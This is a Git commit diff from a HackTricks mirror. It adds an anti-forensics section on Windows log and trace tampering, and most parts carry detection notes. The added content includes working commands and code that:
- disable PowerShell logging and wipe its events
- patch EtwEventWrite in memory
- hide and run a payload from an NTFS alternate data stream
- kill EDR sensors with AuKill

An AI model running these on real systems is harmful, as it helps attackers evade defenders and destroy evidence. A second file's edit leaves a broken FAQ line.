maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Add content from: Research Update: Enhanced src/generic-methodologies-and-reso...

Browse Source
This commit is contained in:
HackTricks News Bot 2025-08-11 01:45:09 +00:00
parent 30fa8082d2
commit d5e2cbfb6a
2 changed files with 85 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

85
src/generic-methodologies-and-resources/basic-forensic-methodology/anti-forensic-techniques.md
View File

@ -142,7 +142,7 @@ It's also possible to modify the configuration of which files are going to be co
### Disable Windows event logs ### Disable Windows event logs
- `reg add 'HKLM\SYSTEM\CurrentControlSet\Services\eventlog' /v Start /t REG_DWORD /d 4 /f` - `reg add 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\eventlog' /v Start /t REG_DWORD /d 4 /f`
- Inside the services section disable the service "Windows Event Log" - Inside the services section disable the service "Windows Event Log"
- `WEvtUtil.exec clear-log` or `WEvtUtil.exe cl` - `WEvtUtil.exec clear-log` or `WEvtUtil.exe cl`
@ -150,6 +150,89 @@ It's also possible to modify the configuration of which files are going to be co
- `fsutil usn deletejournal /d c:` - `fsutil usn deletejournal /d c:`
---
## Advanced Logging & Trace Tampering (2023-2025)
### PowerShell ScriptBlock/Module Logging
Recent versions of Windows 10/11 and Windows Server keep **rich PowerShell forensic artifacts** under
`Microsoft-Windows-PowerShell/Operational` (events 4104/4105/4106).
Attackers can disable or wipe them on-the-fly:
```powershell
# Turn OFF ScriptBlock & Module logging (registry persistence)
New-ItemProperty -Path "HKLM:\\SOFTWARE\\Microsoft\\PowerShell\\3\\PowerShellEngine" \
-Name EnableScriptBlockLogging -Value 0 -PropertyType DWord -Force
New-ItemProperty -Path "HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ModuleLogging" \
-Name EnableModuleLogging -Value 0 -PropertyType DWord -Force
# In-memory wipe of recent PowerShell logs
Get-WinEvent -LogName 'Microsoft-Windows-PowerShell/Operational' |
Remove-WinEvent # requires admin & Win11 23H2+
```
Defenders should monitor for changes to those registry keys and high-volume removal of PowerShell events.
### ETW (Event Tracing for Windows) Patch
Endpoint security products rely heavily on ETW. A popular 2024 evasion method is to
patch `ntdll!EtwEventWrite`/`EtwEventWriteFull` in memory so every ETW call returns `STATUS_SUCCESS`
without emitting the event:
```c
// 0xC3 = RET on x64
unsigned char patch[1] = { 0xC3 };
WriteProcessMemory(GetCurrentProcess(),
GetProcAddress(GetModuleHandleA("ntdll.dll"), "EtwEventWrite"),
patch, sizeof(patch), NULL);
```
Public PoCs (e.g. `EtwTiSwallow`) implement the same primitive in PowerShell or C++.
Because the patch is **process-local**, EDRs running inside other processes may miss it.
Detection: compare `ntdll` in memory vs. on disk, or hook before user-mode.
### Alternate Data Streams (ADS) Revival
Malware campaigns in 2023 (e.g. **FIN12** loaders) have been seen staging second-stage binaries
inside ADS to stay out of sight of traditional scanners:
```cmd
rem Hide cobalt.bin inside an ADS of a PDF
type cobalt.bin > report.pdf:win32res.dll
rem Execute directly
wmic process call create "cmd /c report.pdf:win32res.dll"
```
Enumerate streams with `dir /R`, `Get-Item -Stream *`, or Sysinternals `streams64.exe`.
Copying the host file to FAT/exFAT or via SMB will strip the hidden stream and can be used
by investigators to recover the payload.
### BYOVD & “AuKill” (2023)
Bring-Your-Own-Vulnerable-Driver is now routinely used for **anti-forensics** in ransomware
intrusions.
The open-source tool **AuKill** loads a signed but vulnerable driver (`procexp152.sys`) to
suspend or terminate EDR and forensic sensors **before encryption & log destruction**:
```cmd
AuKill.exe -e "C:\\Program Files\\Windows Defender\\MsMpEng.exe"
AuKill.exe -k CrowdStrike
```
The driver is removed afterwards, leaving minimal artifacts.
Mitigations: enable the Microsoft vulnerable-driver blocklist (HVCI/SAC),
and alert on kernel-service creation from user-writable paths.
---
## References
- Sophos X-Ops “AuKill: A Weaponized Vulnerable Driver for Disabling EDR” (March 2023)
https://news.sophos.com/en-us/2023/03/07/aukill-a-weaponized-vulnerable-driver-for-disabling-edr
- Red Canary “Patching EtwEventWrite for Stealth: Detection & Hunting” (June 2024)
https://redcanary.com/blog/etw-patching-detection
{{#include ../../banners/hacktricks-training.md}} {{#include ../../banners/hacktricks-training.md}}

3
src/welcome/hacktricks-values-and-faq.md
View File

@ -48,7 +48,7 @@ Yes, you can, but **don't forget to mention the specific link(s)** where the con
> [!TIP] > [!TIP]
> >
> - **How can I cite a page of HackTricks?** > - **How can I a page of HackTricks?**
As long as the link **of** the page(s) where you took the information from appears it's enough.\ As long as the link **of** the page(s) where you took the information from appears it's enough.\
If you need a bibtex you can use something like: If you need a bibtex you can use something like:
@ -144,4 +144,3 @@ This license does not grant any trademark or branding rights in relation to the
{{#include ../banners/hacktricks-training.md}} {{#include ../banners/hacktricks-training.md}}